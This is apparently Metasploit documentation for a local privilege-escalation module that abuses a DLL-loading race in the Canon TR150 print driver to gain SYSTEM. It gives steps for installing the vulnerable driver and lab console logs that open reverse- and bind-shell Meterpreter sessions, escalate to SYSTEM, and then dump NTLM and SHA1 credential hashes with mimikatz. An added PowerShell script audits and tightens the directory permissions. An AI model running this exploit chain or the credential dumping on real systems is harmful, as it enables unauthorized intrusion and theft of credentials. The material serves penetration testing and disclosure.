## Vulnerable Application

Canon TR150 print driver versions 3.71.2.10 and below allow local users to read and write files
within the `CanonBJ` directory and its subdirectories. When a new printer is installed with the
`C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs` script, `PrintIsolationHost.exe`,
which runs as `NT AUTHORITY\SYSTEM`, loads
`C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll`.
Because that DLL sits in a user-writable directory, overwriting it with a malicious DLL at the right
moment during the install exploits this timing issue and causes the SYSTEM process to load the
malicious DLL. Successful exploitation grants attackers code execution as the `NT AUTHORITY\SYSTEM` user.

This module leverages the `prnmngr.vbs` script to add and delete printers. Because successful
exploitation depends on winning this race, multiple runs of the module may be required.
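The precondition the module's automatic check reports ("Canon language driver directory grants Users full permissions") can be audited, and tightened as an interim mitigation until the driver is updated, with the PowerShell below. This is an added example written for this page, not code from the Metasploit module or from Canon; it assumes the driver was installed under the default `C:\ProgramData\CanonBJ` path quoted above, and the function names `Get-WeakDllDirectoryAce` and `Protect-DllDirectory` are this example's own.

```powershell
# Added example (not part of the Metasploit module or the Canon driver).
# Audits the Canon language-module tree for ACEs that let low-privileged
# principals write, and optionally replaces them with read-and-execute.
# Assumption: default install path as quoted in the module description.

$CanonRoot       = 'C:\ProgramData\CanonBJ'
$LanguageModules = Join-Path $CanonRoot 'IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules'

# Principals that should never hold write access on a directory from which a
# SYSTEM process (PrintIsolationHost.exe) loads DLLs.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets a standard user plant or replace a DLL in the directory.
$FSR = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $FSR::Write -bor $FSR::Modify -bor $FSR::FullControl -bor $FSR::Delete

function Get-WeakDllDirectoryAce {
    # Lists every Allow ACE under $Path that grants a low-privileged principal
    # write-capable rights. Default: the whole CanonBJ tree, since the weak ACL
    # may be set on the root and inherited downwards.
    [CmdletBinding()]
    param([string]$Path = $CanonRoot)

    if (-not (Test-Path -LiteralPath $Path -PathType Container)) {
        Write-Warning "Directory not found: $Path (driver not installed, or installed elsewhere)"
        return
    }

    # The root plus every subdirectory, e.g. LanguageModules\040C where CNMurGE.dll lives.
    $dirs = @(Get-Item -LiteralPath $Path) +
            @(Get-ChildItem -LiteralPath $Path -Directory -Recurse -ErrorAction SilentlyContinue)

    foreach ($dir in $dirs) {
        $acl = Get-Acl -LiteralPath $dir.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band [int]$WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Directory = $dir.FullName
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Protect-DllDirectory {
    # Interim mitigation: stop inheriting ACEs on the DLL directory, then swap
    # each write-capable Allow ACE for a low-privileged principal with
    # ReadAndExecute, which is all that printing needs. Run from an elevated shell.
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Path = $LanguageModules)

    # Step 1: break inheritance but keep copies of the inherited ACEs as explicit
    # ones. They must be persisted before they can be removed individually.
    $acl = Get-Acl -LiteralPath $Path
    $acl.SetAccessRuleProtection($true, $true)
    Set-Acl -LiteralPath $Path -AclObject $acl

    # Step 2: re-read the now-explicit ACL and replace the offending entries.
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in @($acl.Access)) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteRights) -eq 0) { continue }
        $what = "Replace '$($ace.FileSystemRights)' for $($ace.IdentityReference) with ReadAndExecute"
        if ($PSCmdlet.ShouldProcess($Path, $what)) {
            [void]$acl.RemoveAccessRule($ace)
            $ro = New-Object System.Security.AccessControl.FileSystemAccessRule(
                $ace.IdentityReference, 'ReadAndExecute',
                'ContainerInherit,ObjectInherit', 'None', 'Allow')
            $acl.AddAccessRule($ro)
        }
    }
    Set-Acl -LiteralPath $Path -AclObject $acl
}

# Usage:
#   Get-WeakDllDirectoryAce | Format-Table -AutoSize   # report only
#   Protect-DllDirectory -WhatIf                       # preview the ACL change
#   Protect-DllDirectory                               # apply (elevated)
```

`Get-WeakDllDirectoryAce` is read-only and safe to run as any user who can read the ACLs; an empty result means no low-privileged principal can write anywhere under the tree. `Protect-DllDirectory` deliberately restricts only the `LanguageModules` directory, the one the SYSTEM process loads from, so that other parts of `CanonBJ` the driver may legitimately write to keep working; review any further directories the audit flags before tightening them, and note that a driver update may restore the vendor ACL, so re-run the audit afterwards.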

## Installation Instructions

1. Download the driver installer from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN
1. Open the EXE and run it as an administrator. Wait for the installation to finish.
1. Go to `Add a New Printer or Scanner`, then select `The printer that I want isn't listed`. You may need to press the refresh button for this option to appear.
1. Select `Add a printer using a TCP/IP address or hostname` and click `Next`.
1. Under `Device Type` select `TCP/IP device`, and enter an arbitrary IP address that no device uses.
1. Uncheck `Query the printer and automatically select the driver to use` and click `Next`.
1. Wait briefly; when prompted for additional port information, select `Standard` under `Device Type` and choose `Canon Network Printer`.
1. On the next screen select `Canon TR150 Series` and click `Next`.
1. Select `Use the driver that is currently installed (recommended)` and click `Next`.
1. Click `Next` to accept the default driver name, and the driver should install.

## Verification Steps

1. Install a vulnerable Canon TR150 driver using the steps from `Installation Instructions`
2. Start `msfconsole`
3. Get a session with basic privileges
4. Do: `use exploit/windows/local/canon_driver_privesc`
5. Do: `set SESSION <sess_no>`
6. Do: `run`
7. You should get a shell running as `SYSTEM`.

## Options

This module takes no options beyond the standard `SESSION` option (the session to run the module on); the `show options` output in the scenarios below lists it.

## Scenarios

### Canon TR150 series v3.71.2.10 on Windows 10 Build 17134

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.8:1270
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400

meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/canon_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/canon_driver_privesc) > run

[*] Started reverse TCP handler on 10.0.0.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[*] Adding printer ePzTcgz...
[*] Sending stage (200262 bytes) to 10.0.0.7
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400
[*] Deleting printer ePzTcgz

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > quit
[*] Shutting down Meterpreter...
```

### TR150 series Printer Driver Ver.1.00 on Windows 10 20H2

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.224.211
RHOST => 192.168.224.211
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 192.168.224.211:4444
[*] Sending stage (200262 bytes) to 192.168.224.211
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.224.211:4444) at 2021-08-09 14:11:47 -0500

meterpreter > getuid
Server username: DESKTOP-DIK4B96\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > set LPORT 8877
LPORT => 8877
msf6 exploit(windows/local/canon_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     8877             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\ssSffWM.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer SFywU...
[*] Deleting printer SFywU
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer HRudL...
[*] Sending stage (200262 bytes) to 192.168.224.211
[+] Deleted C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[+] Deleted C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (192.168.224.128:8877 -> 192.168.224.211:61310) at 2021-08-09 14:13:12 -0500
[*] Deleting printer HRudL

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-DIK4B96
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
test      DESKTOP-DIK4B96  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-DIK4B96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-dik4b96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)


meterpreter >
```